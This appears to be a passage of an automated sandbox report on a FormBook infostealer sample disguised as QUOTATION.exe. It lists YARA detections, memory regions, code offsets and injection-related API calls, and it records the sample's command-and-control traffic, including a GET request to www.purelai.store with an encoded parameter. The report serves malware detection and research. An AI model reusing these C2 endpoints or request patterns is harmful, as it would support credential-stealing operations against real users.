Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmp | String found in binary or memory: https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L
Source: unknown | DNS traffic detected: queries for: www.purelai.store
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1 | Host: www.purelai.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | the same 7 unpacked PEs (type: UNPACKEDPE) and 10 memory dumps (type: MEMORY) listed under "Yara detected FormBook" in the AV Detection section above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 1_2_00DAE778
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 1_2_00DAE76B
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 1_2_00DABDC4
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 1_2_00362050
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 13_2_00332050
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00401030
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041E887
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041D969
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00409E5B
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00409E60
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041DFCE
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00402FB0
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FEB090
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FFA830
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01091002
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010AE824
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FF99BF
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010020A0
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A20A8
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FF4120
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A28EC
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FDF900
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A2B28
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0107CB4F
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0100138B
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0100EBB0
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010903DA
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0100ABD8
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0109DBD2
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010823E3
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0108FA2B
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A22AE
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FFAB40
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01094AEF
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FFA309
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A2D07
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A1D55
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01002581
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FFB477
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01092D82
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A25DD
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FE841F
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FED5E0
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0109D466
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01094496
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FD0D20
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010ADFCE
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00FF6E30
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A1FF1
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0109D616
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010A2EF7
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_00522050
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03312B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0326AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0327EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0330DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_033003DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0327ABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032FFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_033122AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0324F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032699BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0331E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0326A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03301002
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_032720A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_033120A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0325B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_033128EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03311FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0331DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03266E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0330D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03312EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03240D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03312D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03311D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03272581
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03302D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0325D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_033125DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0325841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0330D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_03304496
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_0074E887
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_00732D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_00739E60
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_00739E5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 24_2_00732FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0324B150 appears 133 times
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: String function: 00FDB150 appears 136 times
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A360 NtCreateFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A410 NtReadFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A490 NtClose
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A540 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A35B NtCreateFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A40A NtReadFile
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A48A NtClose
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0041A53C NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010199A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010198F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010195D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010197A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010196E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019950 NtQueueApcThread
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010199D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019820 NtEnumerateKey
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0101B040 NtSuspendThread
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_010198A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019B00 NtSetValueKey
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_0101A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 17_2_01019A10 NtQuerySection
